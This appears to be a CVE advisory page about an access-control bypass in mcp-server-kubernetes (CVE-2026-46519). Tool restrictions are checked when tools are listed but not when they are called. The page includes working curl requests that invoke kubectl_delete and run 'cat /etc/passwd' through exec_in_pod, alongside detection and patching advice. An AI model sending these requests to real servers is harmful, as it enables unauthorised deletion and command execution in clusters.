mcp-server-kubernetes, Tool Access Control Bypass, CVE-2026-46519 (Critical)

Listen to this Post

The vulnerability arises from a discrepancy between the tool discovery and execution layers. Three environment variables (ALLOW_ONLY_READONLY_TOOLS, ALLOW_ONLY_NON_DESTRUCTIVE_TOOLS, ALLOWED_TOOLS) are intended to restrict available Kubernetes operations. However, while these controls are correctly enforced in the `ListToolsRequestSchema` handler (which builds the tool list for clients), they are completely missing from the `CallToolRequestSchema` handler. This means an attacker can bypass the configured restrictions by directly crafting a `tools/call` request to any endpoint, such as `kubectl_delete` or exec_in_pod. The server fails to re-validate the requested tool name against the allowed set at the critical execution point, making the access control purely cosmetic. The impact is severe, especially when the server runs with `cluster-admin` privileges, leading to a full cluster compromise.

DailyCVE Form:

Platform: `Kubernetes MCP`
Version: `<3.6.0` Vulnerability: `Auth Bypass` Severity: `Critical` Date: `2026-05-21`

Prediction: `2026-06-04`

What Undercode Say:

Analytics: To detect exploitation attempts, monitor logs for `tools/call` invocations of dangerous commands (e.g., kubectl_delete, exec_in_pod) in environments with restrictive policies. The following command simulates a bypass request for logging purposes:

curl -s http://<HOST>:3003/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","method":"tools/call","params":{"name":"kubectl_delete"}}'

Exploit: Unauthenticated or low-privileged clients can delete resources or execute commands by directly calling any tool name, irrespective of the advertised list.

curl -X POST http://<HOST>:3003/mcp \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"exec_in_pod","arguments":{"name":"test-pod","namespace":"default","command":"cat /etc/passwd"}}}'

Protection from this CVE: Upgrade to version `v3.6.0` or later, which applies the same filtering logic in the `CallToolRequestSchema` handler. As a temporary mitigation, restrict network access to the MCP server’s endpoint (e.g., using firewalls or network policies) to only trusted clients.
Impact: Full cluster compromise if the service account has high privileges; otherwise, unauthorized data access or resource manipulation within the pod’s namespace.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top